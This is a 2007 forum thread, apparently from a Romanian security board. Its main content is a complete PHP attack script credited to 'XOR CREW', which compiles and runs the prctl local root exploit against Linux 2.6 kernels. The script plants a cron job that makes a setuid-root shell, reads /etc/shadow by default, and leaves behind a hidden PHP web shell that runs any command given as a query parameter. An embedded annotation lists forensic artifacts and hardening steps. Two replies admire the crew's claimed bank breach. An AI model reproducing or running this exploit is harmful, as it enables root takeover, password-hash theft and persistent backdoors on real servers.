kw3rln Posted June 30, 2007 Report Posted June 30, 2007 <?php /* ####################################### # # # PRIVATE! PRIVATE! PRIVATE! # # # # XOR CREW # # # # # #######################################
 *
 * Reviewer annotation, read from the code in this listing. Line breaks were
 * lost when the forum post was extracted, so the embedded shell and C text is
 * kept exactly as posted.
 *
 * What the page does
 *   - Without POST data it renders a form. It prints php_uname() and
 *     $_ENV["TMPDIR"], looks through $_ENV["PATH"] for cc or gcc, and writes,
 *     runs and deletes /tmp/test.sh to see whether PHP may run shell commands.
 *   - With exploit_it posted and a uname string containing both "Linux" and
 *     "2.6.", it writes /tmp/a.sh, which creates /tmp/getsuid.c and /tmp/s.c,
 *     compiles both with the POSTed compiler path, runs the results through
 *     passthru(), and writes a second PHP file to the POSTed "php" path.
 *
 * Artifacts a responder can look for
 *   - /tmp/a.sh, /tmp/getsuid.c, /tmp/s.c, /tmp/getsuid, /tmp/s, /tmp/test.sh
 *     (most of these are deleted again by the script itself).
 *   - A file matching /etc/cron.d/core*, and /tmp/s owned by root with mode
 *     4777; both are named in the embedded payload string.
 *   - The wrapper file (form default: <cwd>/.shell.php) and a shell copy (form
 *     default: <cwd>/.ash or <cwd>/.zsh). No line in this script removes them.
 *   - The form's default root command is "cat /etc/shadow"; if a run succeeded,
 *     presumably the password hashes were read -- confirm from request logs.
 *
 * Hardening that removes the preconditions visible here
 *   - Kernel: the code depends on prctl(PR_SET_DUMPABLE, 2) and on a core file
 *     appearing in /etc/cron.d on a 2.6.x kernel. Presumably later kernels
 *     reject this -- verify the patch level against the distribution advisories.
 *   - PHP: passthru() and system() listed in disable_functions, open_basedir
 *     set, and a web user that cannot write inside the document root.
 *   - Host: no compiler on web servers, /tmp mounted nosuid,noexec, and file
 *     integrity or audit watches on /etc/cron.d.
 */ set_time_limit(0); /* Branch 1: request handler, entered only when the form field exploit_it was posted. */ if(isset($_POST['exploit_it'])) { if(stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) { if($_POST['compiler'] == "none") { echo '<div align="center"><h4>No compiler found! Can not continue.</h4></div>'; end; } /* The compiler path is taken from the request and later interpolated into passthru(). */ $cc = $_POST['compiler']; /* $prctl accumulates the text of /tmp/a.sh: a shell script that writes getsuid.c and s.c under /tmp. */ $prctl = '#!/bin/sh cat > /tmp/getsuid.c << __EOF__ #include <stdio.h> #include <sys/time.h> #include <sys/resource.h> #include <unistd.h> #include <linux/prctl.h> #include <stdlib.h> #include <sys/types.h> #include <signal.h> char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n"; int main() { int child; struct rlimit corelimit; corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); if ( !( child = fork() )) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(200); exit(1); } kill(child, SIGSEGV); sleep(120); } __EOF__ cat > /tmp/s.c << __EOF__ #include<stdio.h> main(void) { setgid(0); setuid(0); if (getuid() == 0) { printf("\n[+] We have root!\n\n" ); system("/bin/sh"); system("$_POST[cmd]"); '; if(!stristr($_POST['shell'],"could not be found")) { $prctl .= 'system("cp /bin/ash '.$_POST['shell'].'");'; } $prctl .= 'system("rm -rf /tmp/s"); system("rm -rf /etc/cron.d/core*"); system("exit"); } else { printf("\n[-] Failed.\n\n" ); system("rm -rf '.$_ENV["TMPDIR"].'/s"); } return 0; } __EOF__ '; /* $phpwrapper is the text of a second PHP file that hands a cmd query parameter to passthru(); it is written to the POSTed "php" path below. */ $phpwrapper = '<?php if(isset($_GET[cmd])) { echo "<pre>"; echo passthru("'.$_POST['shell'].' 
-c \"$_GET[cmd]\""); echo "</pre>"; } ?>'; echo "<pre><div align='center'>"; /* Files written from here: /tmp/a.sh and the wrapper at the POSTed "php" path; a.sh then creates the C sources. */ $h = fopen("/tmp/a.sh", "w"); fwrite($h,$prctl); fclose($h); $handle = fopen($_POST['php'], "w"); fwrite($handle, $phpwrapper); fclose($handle); echo "Building exploit...."; echo passthru("sh /tmp/a.sh"); echo passthru("$cc -o /tmp/s /tmp/s.c"); echo passthru("$cc -o /tmp/getsuid /tmp/getsuid.c"); echo "Running exploit...waiting about 4 minutes to see if exploit worked"; echo passthru("/tmp/getsuid"); echo passthru("/tmp/s"); /* Cleanup removes the /tmp build files only; the wrapper file is left in place. */ echo "Cleaning up"; echo passthru("rm -rf /tmp/getsuid*"); echo passthru("rm -rf /tmp/s.c"); echo passthru("rm -rf /tmp/a.sh"); echo "Done!</div> </pre>"; } else { echo "Kernel version IS NOT 2.6.x or is a version known to not work: ".php_uname(); } } else { /* Branch 2: no POST data, so the pre-check page and the form are rendered. */ ?> <div align="center"> <h4>PHP Attack Script</h4> <h5><?php echo php_uname(); ?></h5> <pre><div align="center"> Checking for temp Directory.........<?php echo $_ENV["TMPDIR"]."\n"; ?> Checking for cc or gcc............<?php /* Walks $_ENV["PATH"] and records the first cc or gcc found. */ $path = explode(":",$_ENV["PATH"]); $gotcc = FALSE; $gotgcc = FALSE; foreach($path as $dir) { if(is_file($dir."/cc") && $gotgcc == FALSE && $gotcc == FALSE) { $gotcc = TRUE; $pathtocc = $dir."/cc"; echo '[ <font color="#00CC00">OK</font> ]'."\n"; break; } elseif($gotcc == FALSE && $gotgcc == FALSE && is_file($dir."/gcc")) { $gotgcc = TRUE; $pathtogcc = $dir."/gcc"; echo '[ <font color="#00CC00">OK</font> ]'."\n"; break; } } if($gotcc == FALSE && $gotgcc == FALSE) { echo '[ <font color="#FF0000">Failed</font> ]'."\n"; } ?> Checking for execute permissions..<?php /* Execution probe: writes /tmp/test.sh, runs it with system(), checks the exit status, then deletes it. */ $h = fopen("/tmp/test.sh","w"); fwrite($h,"#!/bin/sh"); fclose($h); system("sh /tmp/test.sh",$returnval); if($returnval == 0) { echo '[ <font color="#00CC00">OK</font> ]'."\n"; } else { echo '[ <font color="#FF0000">Failed</font> ]'."\n"; } passthru("rm -rf /tmp/test.sh"); ?> </pre></div><form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> <table border="0" cellspacing="0"> <tr> <td><div align="right">Exploit:</div></td> 
<td> <select name="exploit"> <option selected="selected">Prctl 2.6.x exploit</option> </select> </td> </tr> <tr> <td><div align="right">Location and name for root shell:</div></td> <td><input type="text" name="shell" size="50" value="<?php if(file_exists("/bin/ash")) { echo getcwd()."/.ash"; } elseif(file_exists("/bin/zsh")) { echo getcwd()."/.zsh"; } else { echo "/bin/ash or /bin/zsh could not be found!"; } ?>"/></td> </tr> <tr> <td><div align="right">Location and name for php shell wrapper: </div></td> <td><input type="text" name="php" size="50" value="<?php echo getcwd()."/.shell.php" ?>" /></td> </tr> <tr> <td><div align="right">Commands to perform while root seperate multiple commands with ; : </div></td> <td><input type="text" name="cmd" size="50" value="cat /etc/shadow" /></td> </tr> </table> </div> <div align="center"> <input type="hidden" name="compiler" value="<?php if(isset($pathtocc)) { echo $pathtocc; } elseif(isset($pathtogcc)) { echo $pathtogcc; } else { echo 'none'; } ?>" /> <input type="hidden" name="exploit_it" value="doit" /> <input name="submit" type="submit" value="Submit" /> After pressing submit it may take up to 4 minutes for the page to load depending on exploit. This is due to the exploit being run. If exploit fails the system may be patched or kernel may not be vuln. </div> </form> <?php } ?> Quote
Johnny Posted June 30, 2007 Îmi place echipa asta, XOR CREW; îs buni. Dacă nu mă înșel, ei au spart Banca Națională din Armenia și h4cky0u.
katmai Posted June 30, 2007 Mda, destul de buni :wink: Un simplu search cu prietenu' meu de pahar și uite rezultatele; pentru cei care vor să afle mai multe, click aici.